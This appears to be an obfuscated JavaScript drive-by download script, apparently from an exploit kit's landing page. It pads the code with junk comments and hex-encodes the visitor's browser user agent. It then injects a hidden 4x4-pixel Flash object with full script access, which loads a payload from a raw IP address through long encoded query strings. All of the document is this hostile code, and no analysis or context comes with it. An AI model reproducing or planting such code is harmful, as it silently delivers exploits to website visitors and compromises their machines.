/*s21053d75938hssfj84213fs*/function hgfgerdfgdf(num, width){/*s13515d14971hfj58470fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s13586d60066hfj24831fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s51741d2901hfj66716fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s85015d79525hfj59148fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd4252hfs*/c += b + d;/*s49544d60234hfj63094fs*/e += 1;}return c;}/*s55839dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.72.20/?NzA1MTYwMzI=&help=gift&paper=xXzQMvWdbRXQC53EKvrcT6NHMVHRH0CL2YydmrHTefjaeVWkzrHFTF_xozKASwSG6_JtdfJSDQ&inform=MzE1NTkxODI=&mail=WzjBCALgRlnt1fAFkW9a6r2kPVnRSd1ZKC_BWPZghD9sGUR-c82gugz7MkcswmwBCC6FETi-hL&money=NDYyMzYwODc=", ghnvbn("http://188.225.72.20/?ODE1NDY3MTg=&mail=nzowIUlhG86us3UCHyhSZh5aHqReNNQtHqpOQFLM72l_yybAdI8l0kReFv2MFzOgtVlgX4QsRmqz7S6CJrg&paper=xH_QMrDYbR3FFYDfKPrEUKdEMU3WA0eKwY-ZhazVF5-xFDfGpbH1FxzspVydCFyEmvFvdLMHIwGh1UfASwd&inform=MTU4OTk1Mjg=&help=money&gift=NDQzMDY0NTQ=","wexykukusw"));